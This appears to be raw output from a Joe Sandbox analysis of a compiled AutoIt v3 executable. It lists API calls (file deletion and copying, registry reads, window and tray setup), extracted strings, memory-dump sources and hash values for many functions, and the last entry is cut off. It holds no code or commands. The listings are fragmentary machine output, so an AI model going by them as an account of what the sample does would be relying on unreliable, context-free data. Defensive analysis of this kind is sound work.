                                                • Opcode ID: 54e07355d5c8d15344f3135c53b9afac032e14ffc18e76548cb109a60937b715
                                                • Instruction ID: b7cbc74dea450437a6768842b320ab310c6acec4b2d0d824e234b2df02cd16af
                                                • Opcode Fuzzy Hash: 54e07355d5c8d15344f3135c53b9afac032e14ffc18e76548cb109a60937b715
                                                • Instruction Fuzzy Hash: ECB2D570608741DFDB24EF24C888BAAB7E5FF84304F14891DF59997291DB79E849CB82

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 007D9008: __time64.LIBCMT ref: 007D9012
                                                  • Part of subcall function 00775045: _fseek.LIBCMT ref: 0077505D
                                                • __wsplitpath.LIBCMT ref: 007D92DD
                                                  • Part of subcall function 0079426E: __wsplitpath_helper.LIBCMT ref: 007942AE
                                                • _wcscpy.LIBCMT ref: 007D92F0
                                                • _wcscat.LIBCMT ref: 007D9303
                                                • __wsplitpath.LIBCMT ref: 007D9328
                                                • _wcscat.LIBCMT ref: 007D933E
                                                • _wcscat.LIBCMT ref: 007D9351
                                                  • Part of subcall function 007D904E: _memmove.LIBCMT ref: 007D9087
                                                  • Part of subcall function 007D904E: _memmove.LIBCMT ref: 007D9096
                                                • _wcscmp.LIBCMT ref: 007D9298
                                                  • Part of subcall function 007D97DD: _wcscmp.LIBCMT ref: 007D98CD
                                                  • Part of subcall function 007D97DD: _wcscmp.LIBCMT ref: 007D98E0
                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D94FB
                                                • _wcsncpy.LIBCMT ref: 007D956E
                                                • DeleteFileW.KERNEL32(?,?), ref: 007D95A4
                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D95BA
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D95CB
                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D95DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 1500180987-0
                                                • Opcode ID: ddc7e22e020221ea7154ab0159c6ddbf02079d76273760d91e6064475f409292
                                                • Instruction ID: 312834c16dca9582c669ad6f5fdfe80599766399ccffa59f4a0fa5c37a60253c
                                                • Opcode Fuzzy Hash: ddc7e22e020221ea7154ab0159c6ddbf02079d76273760d91e6064475f409292
                                                • Instruction Fuzzy Hash: 6DC15BB1E00219AACF21DFA4DC85EDEB7BDEF44314F0040AAF609E6251DB789A45CF65

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773074
                                                • RegisterClassExW.USER32(00000030), ref: 0077309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007730AF
                                                • InitCommonControlsEx.COMCTL32(?), ref: 007730CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007730DC
                                                • LoadIconW.USER32(000000A9), ref: 007730F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00773101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 91ab69438cf109a77fb2ecd30c2024eeb2d446a76e245e086fdb3edc7774ee3e
                                                • Instruction ID: 927056ee50eb07d24e1b9892dd9008e3e86f6b5d91ba53a5d58d249b537365e3
                                                • Opcode Fuzzy Hash: 91ab69438cf109a77fb2ecd30c2024eeb2d446a76e245e086fdb3edc7774ee3e
                                                • Instruction Fuzzy Hash: B9313EB1901309AFDB00DFA4DC84ADEBBF4FF09310F14852AE590E62A0DBB94545CF94

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773074
                                                • RegisterClassExW.USER32(00000030), ref: 0077309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007730AF
                                                • InitCommonControlsEx.COMCTL32(?), ref: 007730CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007730DC
                                                • LoadIconW.USER32(000000A9), ref: 007730F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00773101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: c797db447e89c1068dd09b57bd333a54efa99f2eaecca23e98b121932d8b9d54
                                                • Instruction ID: 45fec844c0b6381af92b1a641fe799bc998144b0d841f203d4cc14bfe5f826d6
                                                • Opcode Fuzzy Hash: c797db447e89c1068dd09b57bd333a54efa99f2eaecca23e98b121932d8b9d54
                                                • Instruction Fuzzy Hash: 4021C9B1901618AFDB00DF94EC89B9EBBF4FB08710F00852AF610E62A0DBB54544CFA5

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00774864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008352F8,?,007737C0,?), ref: 00774882
                                                  • Part of subcall function 0079068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007772C5), ref: 007906AD
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00777308
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007AEC21
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007AEC62
                                                • RegCloseKey.ADVAPI32(?), ref: 007AECA0
                                                • _wcscat.LIBCMT ref: 007AECF9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 2673923337-2727554177
                                                • Opcode ID: 5d42780ecbaf59bae2c71e0b6a58b7cd419316767a81cbc5fb17c85ad107d595
                                                • Instruction ID: ac4f23ec9e1121ba14a960b3912ed0e5da25f53dfb6acb28c372ff3ea108d823
                                                • Opcode Fuzzy Hash: 5d42780ecbaf59bae2c71e0b6a58b7cd419316767a81cbc5fb17c85ad107d595
                                                • Instruction Fuzzy Hash: F6716F71509301EEC714EF29E84589BBBE8FFC5350B41892EF449C32A1EB749958CB91

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773A62
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00773A71
                                                • LoadIconW.USER32(00000063), ref: 00773A88
                                                • LoadIconW.USER32(000000A4), ref: 00773A9A
                                                • LoadIconW.USER32(000000A2), ref: 00773AAC
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00773AD2
                                                • RegisterClassExW.USER32(?), ref: 00773B28
                                                  • Part of subcall function 00773041: GetSysColorBrush.USER32(0000000F), ref: 00773074
                                                  • Part of subcall function 00773041: RegisterClassExW.USER32(00000030), ref: 0077309E
                                                  • Part of subcall function 00773041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007730AF
                                                  • Part of subcall function 00773041: InitCommonControlsEx.COMCTL32(?), ref: 007730CC
                                                  • Part of subcall function 00773041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007730DC
                                                  • Part of subcall function 00773041: LoadIconW.USER32(000000A9), ref: 007730F2
                                                  • Part of subcall function 00773041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00773101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: 482319c53eab3a817c8ac8a2ca36ffc7480928bb5e6e434d91f12451bfb1c8c3
                                                • Instruction ID: 8fa1538c59d6451e42060122ae3bdda6aba1fb41f7fb194c610faff8186b951c
                                                • Opcode Fuzzy Hash: 482319c53eab3a817c8ac8a2ca36ffc7480928bb5e6e434d91f12451bfb1c8c3
                                                • Instruction Fuzzy Hash: 20214B70D00308EFEB10EFA4EC49BAE7BB5FB48711F10452AF904A62A1D7B95650DF94

                                                Control-flow Graph

                                                • Rendered graph not reproduced; function entry 00773633
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?), ref: 007736D2
                                                • KillTimer.USER32(?,00000001), ref: 007736FC
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0077371F
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077372A
                                                • CreatePopupMenu.USER32 ref: 0077373E
                                                • PostQuitMessage.USER32(00000000), ref: 0077375F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: a465c143720e5b2cb277b6aca7c235d7263b98e02afd9d2206185c88bb41ea43
                                                • Instruction ID: 2ad25687a6741c55681710105e16a60f83faeaaf0dd859fba5de664415e5f9fe
                                                • Opcode Fuzzy Hash: a465c143720e5b2cb277b6aca7c235d7263b98e02afd9d2206185c88bb41ea43
                                                • Instruction Fuzzy Hash: 964107B1200605FBDF246B68DC8DB7A3755FB81380F508925FA0AC62A1DB6CDE14E7A5

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                • API String ID: 1825951767-3513169116
                                                • Opcode ID: 97e300a3699dd6b687f8f3c2476c5bb0cd4cd4f9c44a3acb01c466a5b37c0ed6
                                                • Instruction ID: 6a2c9ca8e61c253242d4535e1027ff5d95628500cdaf1f27b4a3e55daa2f0651
                                                • Opcode Fuzzy Hash: 97e300a3699dd6b687f8f3c2476c5bb0cd4cd4f9c44a3acb01c466a5b37c0ed6
                                                • Instruction Fuzzy Hash: 32A18D7281021DDADF14EBA0CC89EEEB778BF54340F448529F51AB7191DF786A09CBA1

                                                Control-flow Graph

                                                • Rendered graph not reproduced; function entry 007739E7
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00773A15
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00773A36
                                                • ShowWindow.USER32(00000000,?,?), ref: 00773A4A
                                                • ShowWindow.USER32(00000000,?,?), ref: 00773A53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: e9762b535a6bbe6b457f33e05f821cac442a354e67cb81149fd658ca4743125f
                                                • Instruction ID: 4324f99d0c2035b09db04019692850b7ae7b6f453c07f7457ea78803e6e9a8e7
                                                • Opcode Fuzzy Hash: e9762b535a6bbe6b457f33e05f821cac442a354e67cb81149fd658ca4743125f
                                                • Instruction Fuzzy Hash: CCF03A70500694BEEA3067276C08E3B2E7DEBC6F50B00442AFA00A2270CA651810CAB0

                                                Control-flow Graph

                                                • Rendered graph not reproduced; function entry 0077410D
                                                APIs
                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007AD51C
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • _memset.LIBCMT ref: 0077418D
                                                • _wcscpy.LIBCMT ref: 007741E1
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007741F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                • String ID: Line:
                                                • API String ID: 3942752672-1585850449
                                                • Opcode ID: 74a5c1b5aab24fc1855856504bd1c0e836126166d698b523db3dceaa7d3f65e2
                                                • Instruction ID: 93d17077047cdb2fb92bb2aeb737678b1da5b9c218dada34cb942e657fa85daa
                                                • Opcode Fuzzy Hash: 74a5c1b5aab24fc1855856504bd1c0e836126166d698b523db3dceaa7d3f65e2
                                                • Instruction Fuzzy Hash: 3331B571408704AEDB25EB60DC4ABDB77D8BF84340F10C91EF599921A1EF789A48C796

                                                Control-flow Graph

                                                • Rendered graph not reproduced; function entry 0079558D
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                • String ID:
                                                • API String ID: 1559183368-0
                                                • Opcode ID: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                • Instruction ID: c10900e5fd548db1172573a2172547c01b9028e7e547719f5548045afe33e944
                                                • Opcode Fuzzy Hash: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                • Instruction Fuzzy Hash: F651E730A00B15DBDF269FB9E88466E77B2EF41330F248729F835962D1D7799E608B50

                                                Control-flow Graph

                                                • Rendered graph not reproduced; function entry 007769CA
                                                APIs
                                                  • Part of subcall function 00774F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774F6F
                                                • _free.LIBCMT ref: 007AE5BC
                                                • _free.LIBCMT ref: 007AE603
                                                  • Part of subcall function 00776BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00776D0D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                • API String ID: 2861923089-1757145024
                                                • Opcode ID: c19a9837366cee24be47019a0318e6233b779ce9551d472a85acd88814135a7f
                                                • Instruction ID: 28506ce544061bd35489659d0be9fb573edbcb02eaf29b7889acc9120d92f0a6
                                                • Opcode Fuzzy Hash: c19a9837366cee24be47019a0318e6233b779ce9551d472a85acd88814135a7f
                                                • Instruction Fuzzy Hash: D7919E71910219EFCF04EFA4DC959EDB7B8FF49314F14852AF815AB291EB38A914CB90

                                                Control-flow Graph

                                                • Rendered graph not reproduced; function entry 007735B0
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007735A1,SwapMouseButtons,00000004,?), ref: 007735D4
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007735A1,SwapMouseButtons,00000004,?,?,?,?,00772754), ref: 007735F5
                                                • RegCloseKey.KERNELBASE(00000000,?,?,007735A1,SwapMouseButtons,00000004,?,?,?,?,00772754), ref: 00773617
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: a7fda972b1254426e0647ca646441db08ad2a8e747361711f1f6ef457e0340dd
                                                • Instruction ID: 6302dfecc0cad6760cf1ece2fcb63672befcfbf6dcfb6653469d59d176864a33
                                                • Opcode Fuzzy Hash: a7fda972b1254426e0647ca646441db08ad2a8e747361711f1f6ef457e0340dd
                                                • Instruction Fuzzy Hash: A7114571611218BFDF208F64DC80EBEBBB8EF04780F108469E809D7210EA759E40ABA4
                                                APIs
                                                  • Part of subcall function 00775045: _fseek.LIBCMT ref: 0077505D
                                                  • Part of subcall function 007D97DD: _wcscmp.LIBCMT ref: 007D98CD
                                                  • Part of subcall function 007D97DD: _wcscmp.LIBCMT ref: 007D98E0
                                                • _free.LIBCMT ref: 007D974B
                                                • _free.LIBCMT ref: 007D9752
                                                • _free.LIBCMT ref: 007D97BD
                                                  • Part of subcall function 00792ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00799BA4), ref: 00792EE9
                                                  • Part of subcall function 00792ED5: GetLastError.KERNEL32(00000000,?,00799BA4), ref: 00792EFB
                                                • _free.LIBCMT ref: 007D97C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                • String ID:
                                                • API String ID: 1552873950-0
                                                • Opcode ID: a87b705b3ae5ae33e206766d6325fe0730d82beb17e6b297fdaebfaef393be7f
                                                • Instruction ID: 5ee24ef84104b70a1d5efa7bedb46f1806b6113f0cda8daf61e19f7f72dab358
                                                • Opcode Fuzzy Hash: a87b705b3ae5ae33e206766d6325fe0730d82beb17e6b297fdaebfaef393be7f
                                                • Instruction Fuzzy Hash: A8518EB1A04218EFDF249F64DC89A9EBBB9EF48314F04409EB609A3341DB755E80CF58
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                • Instruction ID: 5a75be5a7bfd171fad3df7e960b014b98aa665402c7b6540bd0f0463c55e15de
                                                • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                • Instruction Fuzzy Hash: 5E410771A047059FDF288E69E880D6F7BA6AF41374B24863DE859C7640E678ED428B40
                                                APIs
                                                • _memset.LIBCMT ref: 007AED92
                                                • GetOpenFileNameW.COMDLG32(?), ref: 007AEDDC
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                  • Part of subcall function 00790911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00790930
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                • String ID: X
                                                • API String ID: 3777226403-3081909835
                                                • Opcode ID: ef3a6c2d6a6de31637591ff0afaaa89b51133c0e695e2bab428e5b1a80857d7a
                                                • Instruction ID: e2185241f51a82794b36f88f10b0d9ea76b34de4c74c231823575ed890be9545
